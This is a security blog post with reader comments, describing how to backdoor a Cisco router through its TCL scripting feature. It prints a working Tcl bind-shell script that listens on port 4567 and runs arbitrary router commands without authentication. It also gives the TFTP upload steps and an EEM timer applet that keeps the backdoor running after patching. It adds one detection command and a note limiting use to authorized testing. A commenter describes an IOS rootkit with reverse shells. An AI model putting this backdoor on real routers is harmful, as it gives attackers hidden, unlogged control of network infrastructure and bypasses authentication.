Attacking Cisco Router over TCL

Today only lazy or out from the IT sphere person never heard about Cisco. Company specialized in developing network devices and solving all related problems. IOS (Internetwork Operation System) is installed on Cisco networking equipment and allows flexible system configuration. There is different method for attacking Cisco devices but what we will be looking at is attacking Cisco devices using TCL.

Tcl (Tool Command Language) is a scripting language used on embedded systems platforms, both in its full form and in several other small-footprinted versions. From Cisco IOS version 12.3 (7/28/2003), TCL has been included in Cisco IOS as a generic scripting language.

When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. Now for TCL we need privilege level 15 (full admin) rights to execute a script, this level is equivalent to having root privileges in UNIX or administrator privileges in Windows.

For uploading the TCL script to cisco device we can use different protocols such as TFTP, RCP or SCP. For TFTP you do the following:

Router>en
Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl

Now the tcl script has been published by Andy Davis from the Information Risk Management and after some modefication it will looks as follows:

[php]proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " Enter your desired IOS command:"
puts $sock " "
puts -nonewline $sock “Router# ”
puts $sock $response
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 4567
set sh [socket -server callback $port]
vwait var
close $sh_[/php]

Here we will have a backdoor on the router, so if an attacker will run telnet on port 4567 he will have the following:

$ telnet router 4567
Trying router…
Connected to router.
Escape character is ‘^]’.

Enter your desired IOS command:

Router#

This vulnerability has been fixed in recent IOS versions, but you can still use the same technique if you convert the Tclsh script into an EEM policy and trigger it periodically with a timer event as follows:

Router>en
Router # Conf t
Router (config) # event manager applet Tclsh
Router (config-applet) # event timer countdown name Delay time 20
Router (config-applet) # action 1 cli command “enable”
Router (config-applet) # action 2 cli Tclsh tftp://tftpserver/script.tcl

By executing the backdoor a penetration tester can access to the targeted host, bypassing all security measures such as authentication or access logging. For detecting that your router is compromised you need to run:

Router # show tcp brief all

Which is equivalent to Netstat on windows or linux system and it will list all connection established or waiting to be established on the router. So for the security of your business make sure to have the latest IOS version, to update all your systems and to use best practices for implementing or configuring any device.

Warning: The technique demonstrated is intended just for the use during an authorized penetration testing mission.

Refrences:

Cisco IOS Scripting with Tcl

http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html

SANS Institute IOScat – a Port of Netcat’s TCP functions to Cisco IOS http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964

make sure you subscribe to my RSS feed!

Share
Subscribe
Notify of
guest
21 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback

[…] This post was mentioned on Twitter by Jovi Umawing, Mourad Ben Lakhoua, Js Opdebeeck, Mourad ben lakhoua, A. Vanderslyke and others. A. Vanderslyke said: Attacking Cisco Router over TCL http://bit.ly/9tiVMH […]

[…] Attacking Cisco Router over TCL – sectechno.com When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. […]

Jbossvi

yeah I demo’ed this at blackhat 2010
http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss

it was a IOS rootkit and a self propagating IOS worm. the rootkit had forward/reverse shell, traffic pcap dumper, malware httpd server and other stuff. It was all done in tclsh

Mourad

Thanks for the Comment Jason, can I have more details about the lab?

Jbossvi

here is the pdf, lots of examples of the rootkit+accessories, The worm is not public though.

http://www.surf.vi/docs/san_fran.pdf

Mourad

Thanks for sharing Jason very interesting demonstartion.

E-devlet

This is one of the best posts that I’ve ever seen; you may include some more ideas in the same theme. I’m still waiting for some interesting thoughts from your side in your next post.

trackback

TCL Router Backdoor Kung-fu: Attacking Cisco Router over TCL | SecTechno: http://bit.ly/hZSje3

trackback

RT @indi303: Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez9 …

trackback

RT @indi303: Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez9 …

trackback

Oh yea… if you havent seen this http://bit.ly/bdvJtR TCL router backdoors. Hawte. Reminded of it while watching @theprez98 talk @DojoSec

trackback

Attacking Cisco Router over TCL | SecTechno http://ow.ly/19YAQp

trackback

News Update: Attacking Cisco Router over TCL | SecTechno http://ow.ly/19YAQp

trackback

RT @yuridiogenes – Attacking Cisco Router over TCL http://bit.ly/bdvJtR

trackback

Attacking Cisco Router over TCL http://goo.gl/y21aA

trackback

RT @sectechno: Attacking #Cisco Router over #TCL http://bit.ly/a4lsIS #security

trackback

RT @sectechno: Attacking #Cisco Router over #TCL http://bit.ly/a4lsIS #security

fmarousek

first version of this attack (using tclsh) was fixed in IOS 12.4(15)T. Second (using EEM policy) in IOS 12.4(20)T1

johnright

Awesome.
For Router Pictures

trackback

[…] 今天逛国外站发现了一篇攻击Cisco路由器留后门的方法,虽然一年多没玩Cisco了,平时工作也用不到这东西,但是对Cisco还是那么热爱,呵呵!进入正题,这是一篇鸟语的文章,写的也不难,主要的意思就是拿到Cisco路由器的权限以后可以上传一个用TCL脚本语言写的后门程序到设备里面,以后就可以无需路由器管理权限远程Telne进路由器了,灰常给力!关于TCL脚本语言相信CCIE Security级别的Cisco高级玩家都比较熟悉,反正我当年学CCNP的时候课程里面几乎没怎么提到TCL脚本,这东西在Cisco下是个灰常给力的东西,可以帮助工程师完成很多蛋疼的活!例如:在设备上批量的去Ping一个IP地址段等操作。 […]

I_laji.co

en
here,I have a question:
How To config TCL on cisco IOS if it not have been configed?IOS  Verion > 12.4(20)T